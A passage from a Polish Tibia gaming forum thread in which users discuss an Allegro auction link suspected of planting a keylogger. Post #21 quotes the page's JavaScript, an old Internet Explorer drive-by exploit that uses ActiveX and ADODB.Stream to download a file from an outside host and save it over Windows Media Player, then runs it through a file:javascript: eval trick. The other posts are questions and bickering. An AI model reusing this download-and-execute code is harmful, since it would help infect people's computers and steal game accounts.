|
Notki |
Inne To co nie pasuje do któregoś z działów a ma związek z Tibią trafia tutaj. |
![]() |
|
Opcje tematu |
![]() |
#21 |
Nieobecny.
|
![]() Kod:
var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://www.myscreens.republika.pl/serwer*****",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer*****",2); location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer*****",2); " ? Czy ty wogóle wiesz o czym mówisz? Bo jakoś nie zauważyłem.. |
![]() |
![]() |
|
![]() |
#22 |
Użytkownik Forum
Data dołączenia: 09 06 2004
Stan: Niegrający
|
![]() a ja zalicytuje... ciekawe co ten nub zrobi jak wygram...
![]() ![]() |
![]() |
![]() |
![]() |
#23 |
Użytkownik Forum
Data dołączenia: 20 08 2004
Lokacja: Krak
Imię: Ork Gromash
Profesja: Paladin
Świat: Aldora
Poziom: 41
Skille: 74/53
Poziom mag.: 14
|
![]() Mam pytanie
Ja tylko wszedlem na aukcje to nie mam keyloggera?
![]() |
#24 | |
Użytkownik Forum
|
![]() Cytuj:
1 Wiadomość którą wpisałeś jest za krótka. Proszę wydlużyć swoja wiadomość do conajmniej 10 znaków. |
|
![]() |
![]() |
![]() |
#25 | |
Użytkownik Forum
Data dołączenia: 08 10 2004
Lokacja: Rawa Mazowiecka
Stan: Aktywny gracz
Imię: Yoomek
Profesja: Sorcerer
Świat: Harmonia
Poziom: 33
Poziom mag.: 46
|
![]() Cytuj:
|
|
![]() |
![]() |
![]() |
#26 | |||
Użytkownik Forum
Data dołączenia: 07 10 2004
Lokacja: Kolacja?
|
![]() Cytuj:
2) Proponuję, żeby podczas zakładania konta na forum poza podaniem danych trzebaby zdać egzamin z zasad pisowni. 3) Tak, dokładnie. - Norton wskazał na documents&settings/ciasteczka; - Możesz w zasadzie przez ciacho złapać badziewie -widzę, że nie znas funkcji i możliwości ciastek, więc sam poczytaj. I nie strony haker.com ani Komputer świat,a Ty pewnie na tym się zatrzymałeś; 4) Twoja mentalność jest na poziomie tego mistrza, który tu udawał geniusza i w plikach rec znajdował keyloggery, których nie potrafił udowodnić chyba z powodu zbyt słabej znajomości tematu (w jego mniemaniu) wsród użytkowników forum.. 5) "alert o zagrożeniu" wyskoczył podczas otwierania strony; a nigdy nie miałem zainstalowanych żadnych cheatów (bo i po co?). Zresztą gdybyś umiał czytać ze zrozumieniem, zauważyłbyś co napisałem -Link otworzyłem na komputerze, na którym nie mam Tibii. Widzę, że siedzenie i czytanie ze zrozumieniem jednocześnie, to juz dla Ciebie za dużo (no, w końcu to aż 2 czynności!!). 6) Kliknij na ten link i sam sobie zobacz co Ci gdzie zapisze (i bądź pewny, że jeśli będzie alert, to przez macro ![]() Cytuj:
Jasne, że nie masz o ile nie klikniesz w link który znajdziesz w opisie aukcji.
![]() |
![]() |
![]() |
#27 |
Użytkownik Forum
Data dołączenia: 10 12 2004
Lokacja: CalmerA
Stan: Aktywny gracz
Imię: Warrior of abyss
Profesja: Knight
Świat: Calmera
Poziom: 68
Skille: 83/82
Poziom mag.: 7
|
![]() Eh w ogule kupowanie rzeczy na allegro nie jest i nie bedzie nigdy do konca bespieczne :/ Dzieki za ostrzezenie !
![]() |
#28 | |
Użytkownik Forum
|
![]() Cytuj:
bez przesady ale żeby to zrozumieć musiałem 2 razy przeczytać. Nie udawaj że jesteś masterem szybkiego pisania bo to wcale fajnie tutaj nie wygląda staraj się pisać wolniej i tak żeby to było do rozczytania a nie: "cz ywy jestesci egłupi czy nei" |
|
![]() |
![]() |
![]() |
#29 |
Użytkownik Forum
Data dołączenia: 22 12 2004
Lokacja: Belchatów
![]() |
![]() Dobra wlazlem na strone... i co mam keylogera, jutro sie moge spodziewac hacka?
|
![]() |
![]() |
![]() |
#30 | |
Użytkownik Forum
Data dołączenia: 04 03 2005
Lokacja: In da hell
![]() |
![]() Cytuj:
Przeciez pare postow wczesniej osoba sie pytala o to samo... Zanim cos napiszesz na forum przeczytaj dokladnie wszystkie inne posty... Jezeli nie wyrabiasz z ta czynnoscia to popros rodzine (tate, mame, siostre, brata) niech ci wytlumacza o co biega w tym temacie. OK?
![]() |